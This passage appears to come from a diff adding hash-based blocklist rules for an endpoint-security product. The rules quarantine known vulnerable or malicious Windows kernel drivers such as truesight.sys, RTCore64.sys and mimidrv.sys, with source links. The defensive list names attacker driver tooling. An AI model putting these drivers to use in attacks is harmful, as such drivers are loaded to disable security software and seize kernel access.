+ "id": "25c4c79f-0b0d-50d2-9a79-31e20ab7ed09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981726Z",
+ "creation_date": "2026-03-23T11:45:29.981728Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981734Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49ed27460730b62403c1d2e4930573121ab0c86c442854bc0a62415ca445a810",
+ "comment": "Vulnerable Kernel Driver (aka ProxyDrv.sys) [https://www.loldrivers.io/drivers/0e3b0052-18c7-4c8b-a064-a1332df07af2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25c64d50-8972-5d79-af17-8be0d7a5a82b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476724Z",
+ "creation_date": "2026-03-23T11:45:31.476728Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476738Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14e49bc3781d1bd4a629c49d289f0753eeff1620183aff6878921d98411838d4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25cd612d-e075-5ec4-802c-1d75ff73c1b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460608Z",
+ "creation_date": "2026-03-23T11:45:30.460611Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d21aba58222930cb75946a0fb72b4adc96de583d3f7d8dc13829b804eb877257",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25cfdfe6-3621-58f8-b005-dc9da8087dc8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834845Z",
+ "creation_date": "2026-03-23T11:45:30.834848Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834858Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "86ec1a34c5fc59f060905bd400a7b93f17ce035801aeff68084c362303cd8d63",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25d47af5-c410-5763-b3e0-f4315cb3c8f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617765Z",
+ "creation_date": "2026-03-23T11:45:29.617767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5bdba1561ec5b23b1d56ea8cee411147d1526595f03a9281166a563b3641fa2a",
+ "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25d8d234-ce5b-5ee6-9b0b-4da5e892db71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475634Z",
+ "creation_date": "2026-03-23T11:45:31.475638Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475648Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "987c0ae95c1a5af412dbf07f30fadc81c09e762ae030be0d40d178bcdae27869",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25e75c18-8861-5a2e-9267-07eaeb6b340f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463098Z",
+ "creation_date": "2026-03-23T11:45:30.463101Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463110Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b846b0a717665e4d9fb313f25d1f6a5b782e495387aea45cf87ad3c049ac0db",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25f9a628-61a7-5e33-8f9c-93ed5fec5a41",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836667Z",
+ "creation_date": "2026-03-23T11:45:30.836669Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836688Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5503457b83080d56dec2577ea173015d4f947154898d7af3e3f3440d75497cd3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25fb542c-0d83-5bac-b4c2-98003264ba4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472885Z",
+ "creation_date": "2026-03-23T11:45:30.472888Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79440da6b8178998bdda5ebde90491c124b1967d295db1449ec820a85dc246dd",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25fce0b8-a31c-5b3f-8f93-3272b92ddc79",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459587Z",
+ "creation_date": "2026-03-23T11:45:30.459598Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459607Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8168304169a2453c0c3e0a285c2a07d3b3b83433e0342f6b33400c371af86221",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26011834-75fc-5513-81c8-5d7abe8b447f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807660Z",
+ "creation_date": "2026-03-23T11:45:31.807662Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be3d34831f9c5756b5c4914113e191435a35482b56af72b97de05b26fd396496",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "260c36bb-031e-5c99-a909-cad0dddd3638",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467181Z",
+ "creation_date": "2026-03-23T11:45:30.467184Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467193Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0820ae4ffc5258b49787423bd392cd29a6a77777b955dd210a41238b02f05c3e",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2624c951-7316-5756-814b-cedf761e77d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810200Z",
+ "creation_date": "2026-03-23T11:45:31.810202Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810208Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18cb010c716e03e8341ba43b4423695306d85b8723e7a89f5d8a73c6ddb25169",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26250b78-d22a-568c-baf5-ea8e937f41c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817914Z",
+ "creation_date": "2026-03-23T11:45:31.817918Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817927Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0eadb6eff81dd20553f7564b31147af7064dc8f5b7d71407ca24c4783cd0ffd4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "263de15c-e0c5-5972-91e0-8308e333822b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491244Z",
+ "creation_date": "2026-03-23T11:45:31.491247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7e358fee32f2437831f45baee3a8513c5f1e34b06d1b0442891600a338206bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "263f7a4c-decb-5e71-bc2d-be9aa6cfa2b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473842Z",
+ "creation_date": "2026-03-23T11:45:30.473846Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473854Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e307281c9f7329579988190e24a655b15bb2e60afc585109f05a79e5aba81a0",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2641b4da-7d0f-54aa-920f-25472d592ace",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828742Z",
+ "creation_date": "2026-03-23T11:45:31.828744Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828749Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47b34c0c133155e7a36993a79f6f9d0edc174d64087385560f28b38f15e3b1f1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "264f52d1-382c-5b79-911e-187ae83ece5e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827820Z",
+ "creation_date": "2026-03-23T11:45:30.827822Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827828Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "619bebecbd811dc30558beb48a9bfe437c4807b5bc34543a6b6b4f1ebc564445",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26501787-413b-58d6-a82e-d1d9c84dde45",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978527Z",
+ "creation_date": "2026-03-23T11:45:29.978529Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978534Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05",
+ "comment": "Vulnerable Kernel Driver (aka AMDPowerProfiler.sys) [https://www.loldrivers.io/drivers/9a4fb66e-9084-4b21-9d76-a7afbe330606/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "265d45b5-1b73-5f18-967b-7c34b1ed731d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465765Z",
+ "creation_date": "2026-03-23T11:45:30.465768Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "793b78e70b3ae3bb400c5a8bc4d2d89183f1d7fc70954aed43df7287248b6875",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26822bab-ab21-5d71-afb2-98e01c88d1de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984140Z",
+ "creation_date": "2026-03-23T11:45:29.984142Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984147Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c",
+ "comment": "Vulnerable Kernel Driver (aka OpenLibSys.sys) [https://www.loldrivers.io/drivers/2e4fedb0-30ed-400d-b4e1-b2b2004c1607/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26884fc8-f8b5-536d-9e37-90a04d0a3081",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483689Z",
+ "creation_date": "2026-03-23T11:45:31.483692Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483701Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89c1821b4546ae1d1fb4e84c9243691309d8191164573e978887c211b29471c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2688ae05-ac5d-5091-ad82-87d0b4cf8163",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827122Z",
